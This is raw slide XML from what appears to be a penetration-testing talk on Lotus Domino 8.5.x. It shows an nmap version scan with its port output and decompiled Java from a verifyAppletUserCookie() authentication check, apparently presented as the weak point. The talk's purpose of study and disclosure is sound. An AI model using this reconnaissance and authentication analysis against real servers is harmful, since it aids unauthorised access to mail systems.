              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66661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496" y="116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Let’s see some real stuff</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35496" y="1268760"/>
            <a:ext cx="9108504" cy="5328592"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>First pen-test  		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Lotus Domino 8.5.2FP2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" u="sng" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Second pen-test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>		-	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>Lotus Domino 8.5.3  (the latest)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>How to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>-PN -T5 -p … 0 192.168.0.13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>. . .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>scan report for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>targethost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> (192.168.0.13)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>PORT     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" i="1" dirty="0"/>
              <a:t>STATE SERVICE           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>VERSION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>110/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>   open  pop3          Lotus Domino POP3 server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>8.5.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>1352/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>lotusnotes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>        Lotus Domino server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>(CN=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>SERV;Org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>=Company)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>1533/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>  open  http          Lotus Domino </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>2050/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>unknown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>49152/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>  open  http          Microsoft HTTP API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>Address: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>00:1A:1B:8A:1F:1E </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>(Hewlett Packard)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t>Service Info: OS: Windows/Longhorn/64 6.1</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1"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27</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Скругленный прямоугольник 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940152" y="2420888"/>
            <a:ext cx="2736304" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3492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Scan and grab banners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detect version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6228184" y="2060848"/>
            <a:ext cx="2021707"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Pen-tester’s actions</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Скругленный прямоугольник 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940152" y="2420888"/>
            <a:ext cx="2736304" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3492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Green line in report?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Скругленный прямоугольник 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940152" y="2420888"/>
            <a:ext cx="2736304" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3492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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>OR…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196737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417984"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And again… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>verifyAppletUserCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-226876" y="1628800"/>
            <a:ext cx="9263372" cy="4968552"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> do {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>             if((j = s7.indexOf("&lt;user ", j)) &lt;= 0) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>          	break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> k = s7.indexOf("&gt;", j);       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>              if(k == -1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>                         break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>s2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>getStringToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, "user=\"", "\"", j, k);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>            . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>s3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>getStringToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, "cookie=\"", "\"", j, k);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>            . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>s4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>getStringToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, "address=\"", "\"", j, k);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>.equalsIgnoreCase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>) &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>.equalsIgnoreCase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>) &amp;&amp;\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>appletUserAddress.equalsIgnoreCase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>s4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>flag = true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>     break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> 	. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2228850" lvl="5" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>     } while(true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2686050" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	. . .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200"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28</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Овал 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843808" y="1772816"/>
            <a:ext cx="1656184" cy="432048"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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2843808" y="2496345"/>
            <a:ext cx="1584176" cy="356591"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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4355976" y="3284984"/>
            <a:ext cx="1728192" cy="432048"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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3059832" y="3789040"/>
            <a:ext cx="2088232" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="34925">
            <a:solidFill>
